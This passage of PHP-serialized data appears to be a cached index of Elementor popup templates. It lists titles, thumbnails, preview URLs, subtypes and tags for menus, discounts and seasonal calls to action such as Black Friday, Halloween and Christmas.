screen\";s:4:\"tags\";s:35:\"[\"Booking\",\"Conference\",\"Creative\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:71;a:21:{s:4:\"tmpl\";i:1354;s:2:\"id\";i:23129;s:5:\"title\";s:29:\"Slide-In | Menu | VR Headsets\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/VR-headset-small.jpg\";s:12:\"tmpl_created\";i:1647781211;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/slide-in-menu-vr-headsets/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:8:\"[\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:72;a:21:{s:4:\"tmpl\";i:1355;s:2:\"id\";i:23139;s:5:\"title\";s:31:\"Classic | Contact | VR Headsets\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/03/VR-headset-small-1.jpg\";s:12:\"tmpl_created\";i:1647781384;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/classic-contact-vr-headsets/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:11:\"[\"Contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:73;a:21:{s:4:\"tmpl\";i:1356;s:2:\"id\";i:23149;s:5:\"title\";s:38:\"Slide-In | Menu | Portrait Photography\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2022/03/48-portrair-photography-Menu.jpg\";s:12:\"tmpl_created\";i:1647782336;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/slide-in-menu-portrait-photography/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:8:\"[\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:74;a:21:{s:4:\"tmpl\";i:1357;s:2:\"id\";i:23159;s:5:\"title\";s:47:\"Hello Bar | Subscription | Portrait Photography\";s:9:\"thumbnail\";s:97:\"https://library.elementor.com/wp-content/uploads/2022/03/48-portrair-photography-Subscription.jpg\";s:12:\"tmpl_created\";i:1647782478;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:149:\"https://library.elementor.com/popups/hello-bar-subscription-portrait-photography/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:34:\"[\"Blog\",\"Photography\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:75;a:21:{s:4:\"tmpl\";i:1358;s:2:\"id\";i:23169;s:5:\"title\";s:32:\"Full Screen | Menu | English Pub\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/49-englisg-pub-Menu.jpg\";s:12:\"tmpl_created\";i:1647782664;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/full-screen-menu-english-pub/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:76;a:21:{s:4:\"tmpl\";i:1359;s:2:\"id\";i:23179;s:5:\"title\";s:32:\"Classic | Discount | English Pub\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/49-englisg-pub-Discount.jpg\";s:12:\"tmpl_created\";i:1647782796;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/classic-discount-english-pub/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:20:\"[\"Discount\",\"Offer\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:77;a:21:{s:4:\"tmpl\";i:1360;s:2:\"id\";i:23189;s:5:\"title\";s:27:\"Full Screen | Menu | Singer\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/58-Music-Artist-Menu.jpg\";s:12:\"tmpl_created\";i:1647783070;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/full-screen-menu-singer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:29:\"[\"Fullscreen\",\"menu\",\"Music\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:78;a:21:{s:4:\"tmpl\";i:1361;s:2:\"id\";i:23200;s:5:\"title\";s:31:\"Classic | Subscription | Singer\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2022/03/58-Music-Artist-Subscription.jpg\";s:12:\"tmpl_created\";i:1647783249;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/classic-subscription-singer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:21:\"[\"Music\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:79;a:21:{s:4:\"tmpl\";i:1362;s:2:\"id\";i:23210;s:5:\"title\";s:38:\"Full Screen | Menu | Virtual Assistant\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/virtual-assistnt-73-small.jpg\";s:12:\"tmpl_created\";i:1647784292;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/full-screen-menu-virtual-assistant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:80;a:21:{s:4:\"tmpl\";i:1363;s:2:\"id\";i:23223;s:5:\"title\";s:39:\"Hello Bar | Contact | Virtual Assistant\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/03/73-Virtual-Assistant-Contact-Us.jpg\";s:12:\"tmpl_created\";i:1647784616;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:141:\"https://library.elementor.com/popups/hello-bar-contact-virtual-assistant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:37:\"[\"Contact\",\"Psychologist\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:81;a:21:{s:4:\"tmpl\";i:1364;s:2:\"id\";i:23234;s:5:\"title\";s:32:\"Slide-In | Menu | Personal Chef\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/74-Personal-Chef-Menu.jpg\";s:12:\"tmpl_created\";i:1647798194;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/slide-in-menu-personal-chef/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:8:\"[\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:82;a:21:{s:4:\"tmpl\";i:1365;s:2:\"id\";i:23244;s:5:\"title\";s:29:\"Classic | CTA | Personal Chef\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/74-Personal-Chef-Contact-Us.jpg\";s:12:\"tmpl_created\";i:1647798297;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/classic-cta-personal-chef/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:24:\"[\"Booking\",\"Chef\",\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:83;a:21:{s:4:\"tmpl\";i:1366;s:2:\"id\";i:23254;s:5:\"title\";s:31:\"Full Screen | Menu | Food Truck\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/food-truck-76-small-1.jpg\";s:12:\"tmpl_created\";i:1647798447;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/full-screen-menu-food-truck/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:84;a:21:{s:4:\"tmpl\";i:1367;s:2:\"id\";i:23265;s:5:\"title\";s:30:\"Fly-In | Discount | Food Truck\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/food-truck-76-small.jpg\";s:12:\"tmpl_created\";i:1647798657;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/fly-in-discount-food-truck/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:20:\"[\"Discount\",\"Offer\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:85;a:21:{s:4:\"tmpl\";i:1369;s:2:\"id\";i:23323;s:5:\"title\";s:28:\"Classic | CTA | Black Friday\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/Black-Friday-6-Small.jpg\";s:12:\"tmpl_created\";i:1647855505;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/classic-cta-black-friday/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Black Friday\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:86;a:21:{s:4:\"tmpl\";i:1370;s:2:\"id\";i:23329;s:5:\"title\";s:29:\"Slide-In | CTA | Black Friday\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/Black-Friday-5-Small.jpg\";s:12:\"tmpl_created\";i:1647855865;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/slide-in-cta-black-friday/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:34:\"[\"Black Friday\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:87;a:21:{s:4:\"tmpl\";i:1371;s:2:\"id\";i:23335;s:5:\"title\";s:31:\"Slide-In | CTA | Black Friday 1\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/Black-Friday-1-Small.jpg\";s:12:\"tmpl_created\";i:1647856357;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/slide-in-cta-black-friday-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:34:\"[\"Black Friday\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:88;a:21:{s:4:\"tmpl\";i:1372;s:2:\"id\";i:23341;s:5:\"title\";s:30:\"Classic | CTA | Black Friday 2\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/Black-Friday-3-Small.jpg\";s:12:\"tmpl_created\";i:1647856493;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-cta-black-friday-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Black Friday\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:89;a:21:{s:4:\"tmpl\";i:1373;s:2:\"id\";i:23347;s:5:\"title\";s:30:\"Classic | CTA | Black Friday 3\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/Black-Friday-2-Small.jpg\";s:12:\"tmpl_created\";i:1647856891;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-cta-black-friday-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Black Friday\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:90;a:21:{s:4:\"tmpl\";i:1374;s:2:\"id\";i:23354;s:5:\"title\";s:30:\"Classic | CTA | Black Friday 4\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/Black-Friday-4-Small.jpg\";s:12:\"tmpl_created\";i:1647856996;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-cta-black-friday-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Black Friday\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:91;a:21:{s:4:\"tmpl\";i:1375;s:2:\"id\";i:23394;s:5:\"title\";s:27:\"Classic | CTA | Halloween 1\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Halloween-3-Small.jpg\";s:12:\"tmpl_created\";i:1647857351;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/classic-cta-halloween-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:31:\"[\"cta\",\"Ecommerce\",\"Halloween\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:92;a:21:{s:4:\"tmpl\";i:1376;s:2:\"id\";i:23401;s:5:\"title\";s:33:\"Slide-In | Discount | Halloween 2\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Halloween-2-Small.jpg\";s:12:\"tmpl_created\";i:1647857567;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/slide-in-discount-halloween-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:36:\"[\"Discount\",\"Ecommerce\",\"Halloween\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:93;a:21:{s:4:\"tmpl\";i:1377;s:2:\"id\";i:23407;s:5:\"title\";s:33:\"Slide-In | Discount | Halloween 3\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Halloween-1-Small.jpg\";s:12:\"tmpl_created\";i:1647857814;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/slide-in-discount-halloween-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:36:\"[\"Discount\",\"Ecommerce\",\"Halloween\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:94;a:21:{s:4:\"tmpl\";i:1378;s:2:\"id\";i:23416;s:5:\"title\";s:31:\"Fly-In | Discount | Halloween 4\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Halloween-5-Small.jpg\";s:12:\"tmpl_created\";i:1647858024;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/fly-in-discount-halloween-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:44:\"[\"Discount\",\"Ecommerce\",\"Halloween\",\"Offer\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:95;a:21:{s:4:\"tmpl\";i:1379;s:2:\"id\";i:23422;s:5:\"title\";s:36:\"Classic | Subscription | Halloween 5\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Halloween-4-Small.jpg\";s:12:\"tmpl_created\";i:1647858246;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-subscription-halloween-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:48:\"[\"Discount\",\"Ecommerce\",\"Halloween\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:96;a:21:{s:4:\"tmpl\";i:1380;s:2:\"id\";i:23471;s:5:\"title\";s:28:\"Slide-In | CTA | Christmas 1\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Christmas-2-Small.jpg\";s:12:\"tmpl_created\";i:1647859193;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/slide-in-cta-christmas-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:19:\"[\"Christmas\",\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:97;a:21:{s:4:\"tmpl\";i:1381;s:2:\"id\";i:23477;s:5:\"title\";s:28:\"Slide-In | CTA | Christmas 